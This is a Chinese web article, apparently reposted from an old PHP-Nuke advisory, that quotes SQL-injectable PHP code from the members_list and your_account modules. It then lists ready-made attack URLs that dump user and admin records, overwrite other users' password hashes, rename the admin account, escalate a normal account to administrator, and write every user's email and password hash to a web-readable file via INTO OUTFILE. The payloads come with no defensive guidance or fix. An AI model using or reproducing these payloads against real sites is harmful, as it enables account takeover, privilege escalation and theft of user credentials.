利用sql注入缺陷进行攻击的方法及代码

sql的members_list、your_account模块中存在注入缺陷。如果magic_quotes_gpc选项为“off”，攻击者使用下列攻击方法及代码能利用该缺陷：

　　php代码/位置：

?/modules/members_list/index.php :
------------------------------------------------------------------------
[...]
$count = "select count(uid) as total from ".$user_prefix."_users ";
$select = "select uid, name, uname, femail, url from
".$user_prefix."_users ";
$where = "where uname != anonymous ";

if ( ( $letter != "other" ) and ( $letter != "all" ) ) {
$where .= "and uname like ".$letter."% ";

} else if ( ( $letter == "other" ) and ( $letter != "all" ) ) {
$where .= "and uname regexp \"^\[1-9]\" ";

} else {
$where .= "";
}
$sort = "order by $sortby";
$limit = " asc limit ".$min.", ".$max;

$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);

$result = sql_query($select.$where.$sort.$limit, $dbi) or die();

echo " ";
if ( $letter != "front" ) {
echo "<table width=\"100%\" border=\"0\"
cellspacing=\"1\"><tr>\n";
echo "<td bgcolor=\"$bgcolor4\" align=\"center\">"._nickname."</td>\n";
echo "<td bgcolor=\"$bgcolor4\" align=\"center\">"._realname."</td>\n";
echo "<td bgcolor=\"$bgcolor4\" align=\"center\">"._email."</td>\n";
echo "<td bgcolor=\"$bgcolor4\" align=\"center\">"._url."</td>\n";
$cols = 4;
[...]
------------------------------------------------------------------------

/modules/your_account/index.php :
switch($op) {
[...]
case "mailpasswd":
mail_password($uname, $code);
break;

case "userinfo":
userinfo($uname, $bypass, $hid, $url);
break;

case "login":
login($uname, $pass);
break;
[...]
case "saveuser":
saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,
$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
break;
[...]
case "savehome":
savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
$popmeson);
break;

case "savetheme":
savetheme($uid, $theme);
break;
[...]
case "savecomm":
savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
break;
[...]
}
------------------------------------------------------------------------

/modules/your_account/index.php :
[...]
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,
$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
global $user, $ｃookie, $userinfo, $editedmessage, $user_prefix, $dbi,
$module_name;
ｃookiedecode($user);
$check = $ｃookie[1];
$check2 = $ｃookie[2];
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname=$check", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) and ($check2 == $ccpass)) {
if (!eregi("http://";, $url)) {
$url = "http://$url";
}
if ((isset($pass)) && ("$pass" != "$vpass")) {
echo "<center>"._passdifferent."</center>";
} elseif (($pass != "") && (strlen($pass) < $minpass)) {
echo "<center>"._youpassmustbe." $minpass
"._charlong."</center>";
} else {
if ($bio) { filter_text($bio); $bio = $editedmessage; $bio =
fixquotes($bio); }
if ($pass != "") {
ｃookiedecode($user);
sql_query("lock tables ".$user_prefix."_users write", $dbi);
$pass = md5($pass);
sql_query("update ".$user_prefix."_users set name=$realname,
email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio ,
user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,
user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,
user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,
newsletter=$newsletter where uid=$uid", $dbi);
$result = sql_query("select uid, uname, pass, storynum, umode, uorder,
thold, noscore, ublockon, theme from ".$user_prefix."_users where
uname=$uname and pass=$pass", $dbi);
if(sql_num_rows($result, $dbi)==1) {
$userinfo = sql_fetch_array($result, $dbi);

doｃookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],
$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
$userinfo[theme],$userinfo[commentmax]);
} else {
echo "<center>"._somethingwrong."</center> ";
}
sql_query("unlock tables", $dbi);
} else {
sql_query("update ".$user_prefix."_users set name=$realname,
email=$email, femail=$femail, url=$url, bio=$bio,
user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,
user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,
user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,
newsletter=$newsletter where uid=$uid", $dbi);
if ($attach) {
$a = 1;
} else {
$a = 0;
}
}
header("location: modules.php?name=$module_name");
}
}
}
[...]
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
$popmeson) {
global $user, $ｃookie, $userinfo, $user_prefix, $dbi, $module_name;
ｃookiedecode($user);
$check = $ｃookie[1];
$check2 = $ｃookie[2];
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname=$check", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) and ($check2 == $ccpass)) {
if(isset($ublockon)) $ublockon=1; else $ublockon=0;
$ublock = fixquotes($ublock);
sql_query("update ".$user_prefix."_users set storynum=$storynum,
ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast,
popmeson=$popmeson where uid=$uid", $dbi);
getusrinfo($user);
doｃookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],
$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
$userinfo[theme],$userinfo[commentmax]);
header("location: modules.php?name=$module_name");
}
}

function savetheme($uid, $theme) {
global $user, $ｃookie, $userinfo, $user_prefix, $dbi, $module_name;
ｃookiedecode($user);
$check = $ｃookie[1];
$check2 = $ｃookie[2];
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname=$check", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) and ($check2 == $ccpass)) {
sql_query("update ".$user_prefix."_users set theme=$theme where
uid=$uid", $dbi);
getusrinfo($user);
doｃookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],
$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
$userinfo[theme],$userinfo[commentmax]);
header("location: modules.php?name=$module_name&theme=$theme");
}
}
[...]
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore,
$commentmax) {
global $user, $ｃookie, $userinfo, $user_prefix, $dbi, $module_name;
ｃookiedecode($user);
$check = $ｃookie[1];
$check2 = $ｃookie[2];
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname=$check", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) and ($check2 == $ccpass)) {
if(isset($noscore)) $noscore=1; else $noscore=0;
sql_query("update ".$user_prefix."_users set umode=$umode,
uorder=$uorder, thold=$thold, noscore=$noscore,
commentmax=$commentmax where uid=$uid", $dbi);
getusrinfo($user);
doｃookie($userinfo[uid],$userinfo[uname],$userinfo[pass],
$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],
$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
header("location: modules.php?name=$module_name");
}
}
[...]
------------------------------------------------------------------------

/modules/your_account/index.php :
[...]
function mail_password($uname, $code) {
global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi,
$module_name;
$result = sql_query("select email, pass from ".$user_prefix."_users
where (uname=$uname)", $dbi);
if(!$result) {
include("header.php");
opentable();
echo "<center>"._sorrynouserinfo."</center>";
closetable();
include("footer.php");
[...]
------------------------------------------------------------------------

------------------------------------------------------------------------
[...]
function userinfo($uname, $bypass=0, $hid=0, $url=0) {
global $user, $ｃookie, $sitename, $prefix, $user_prefix, $dbi, $admin,
$broadcast_msg, $my_headlines, $module_name;
$result = sql_query("select uid, femail, url, bio, user_avatar,
user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,
user_sig, pass, newsletter from ".$user_prefix."_users where
uname=$uname", $dbi);
$userinfo = sql_fetch_array($result, $dbi);
[...]
------------------------------------------------------------------------

------------------------------------------------------------------------
[...]
function login($uname, $pass) {
global $setinfo, $user_prefix, $dbi, $module_name;
$result = sql_query("select pass, uid, storynum, umode, uorder, thold,
noscore, ublockon, theme, commentmax from ".$user_prefix."_users where
uname=$uname", $dbi);
$setinfo = sql_fetch_array($result, $dbi);
[...]
}
[...]
------------------------------------------------------------------------

　　members_list模块：

　　- 显示用户:

http://[target]/modules.php?name=members_list&letter=all&sortby=pass

　　- 显示用户:

http://[target]/modules.php?name=members_list&letter=all&sortby=uid

　　- 显示moderators :

http://[target]/modules.php?name=members_list&letter=%20or%20user_level=2/*

　　- 显示管理员:

http://[target]/modules.php?name=members_list&letter=%20or%20user_level=4/*

　　- 显示所有以“abc”开头的用户 :

http://[target]/modules.php?name=members_list&letter=%20or%20pass%20like%20abc%25/*

　　your_account模块 :

　　- 将“admind”用户更名为“hophophop” :

http://[target]/modules.php?name=your_account&op=savetheme&theme=,name=hophophop%20where%20uname=admin/*&uid=[our_uid]

　　- 在md5_decrypted中将“bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”：

http://[target]/modules.php?name=your_account&op=savetheme&theme=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
　　或：

http://[target]/modules.php?name=your_account&op=saveuser&realname=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
　　或：

http://[target]/modules.php?name=your_account&op=saveuser&email=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
　　或：

http://[target]/modules.php?name=your_account&op=savehome&storynum=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
　　或：

http://[target]/modules.php?name=your_account&op=savehome&ublockon=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
　　或：

http://[target]/modules.php?name=your_account&op=savecomm&umode=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]　
　　或：

http://[target]/modules.php?name=your_account&op=savecomm&thold=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]

　　- 将普通用户提升至管理员权限:

http://[target]/modules.php?name=your_account&op=savetheme&theme=,user_level=4&uid=[our_uid]

　　或：

http://[target]/modules.php?name=your_account&op=saveuser&femail=,user_level=4&uid=[our_uid]

　　或：

http://[target]/modules.php?name=your_account&op=saveuser&url=http://,user_level=4&uid=[our_uid]

　　或：

http://[target]/modules.php?name=your_account&op=savehome&broadcast=,user_level=4&uid=[our_uid]

　　或：

http://[target]/modules.php?name=your_account&op=savecomm&uorder=,user_level=4&uid=[our_uid]

　　- 将所有用户的电子邮件和crypted密码保存在http://[target]/allmailpass.txt中 :

http://[target]/modules.php?name=your_account&op=mailpasswd&uname=)
%20or%201=1%20into%20outfile%20/[path/to/site]/allmailpass.txt/*

　　利用ｃookie发送crypted密码能访问用户帐户。

　　- 将用户的所有信息保存在http://[target]/admintxt中:

http://[target]/modules.php?name=your_account&op=login&uname=%20or%user_level>
1%20into%20outfile%20/[path/to/site]/admin.txt

[path/to/site]能在http://[target]/modules/forums/bb_smilies.php中查询到。

ICP备案编号:粤ICP备06052964号

www.sosof.com

选择显示字体大小

利用sql注入缺陷进行攻击的方法及代码

关键字本文所属关键字

相关与本文相关文章

分类所有文章关键字导航

源码编程相关

SQL数据库相关

手机无线相关

网页设计制作相关

网站建设推广相关

操作系统/服务器相关

图形图像多媒体相关

标准网站致力的规范

www.sosof.com

选择显示字体大小

利用sql注入缺陷进行攻击的方法及代码

shouchang();

关键字 本文所属关键字

相关 与本文相关文章

分类 所有文章关键字导航

源码编程相关

SQL数据库相关

手机无线相关

网页设计制作相关

网站建设推广相关

操作系统/服务器相关

图形图像多媒体相关

标准 网站致力的规范

关键字本文所属关键字

相关与本文相关文章

分类所有文章关键字导航

标准网站致力的规范